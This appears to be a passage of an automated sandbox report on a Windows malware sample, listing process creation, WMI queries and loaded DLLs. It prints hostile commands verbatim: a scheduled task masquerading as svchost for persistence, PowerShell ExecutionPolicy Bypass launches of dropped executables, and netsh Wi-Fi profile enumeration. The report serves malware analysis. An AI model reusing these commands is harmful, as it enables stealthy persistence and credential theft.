                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ExecutablePath, ProcessID FROM Win32_Process
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: tmp761C.tmp.dat.15.dr, tmpAD0A.tmp.dat.28.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                    Source: zrrHgsDzgS.exeReversingLabs: Detection: 86%
                    Source: zrrHgsDzgS.exeVirustotal: Detection: 82%
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeFile read: C:\Users\user\Desktop\zrrHgsDzgS.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\zrrHgsDzgS.exe "C:\Users\user\Desktop\zrrHgsDzgS.exe"
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"'
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3
                    Source: unknownProcess created: C:\Users\user\AppData\Roaming\svchost.exe C:\Users\user\AppData\Roaming\svchost.exe
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe"
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\udwnme.exe "C:\Users\user\AppData\Local\Temp\udwnme.exe"
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exit
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\luglzv.exe "C:\Users\user\AppData\Local\Temp\luglzv.exe"
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' & exitJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpF775.tmp.bat""Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "svchost" /tr '"C:\Users\user\AppData\Roaming\svchost.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 3Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Roaming\svchost.exe "C:\Users\user\AppData\Roaming\svchost.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' & exitJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c start /b powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"' & exitJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\udwnme.exe"' Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\udwnme.exe "C:\Users\user\AppData\Local\Temp\udwnme.exe" Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr AllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssidJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\user\AppData\Local\Temp\luglzv.exe"'
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\luglzv.exe "C:\Users\user\AppData\Local\Temp\luglzv.exe"
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                    Source: C:\Users\user\AppData\Local\Temp\luglzv.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profile
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr All
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\zrrHgsDzgS.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\timeout.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\svchost.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\udwnme.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
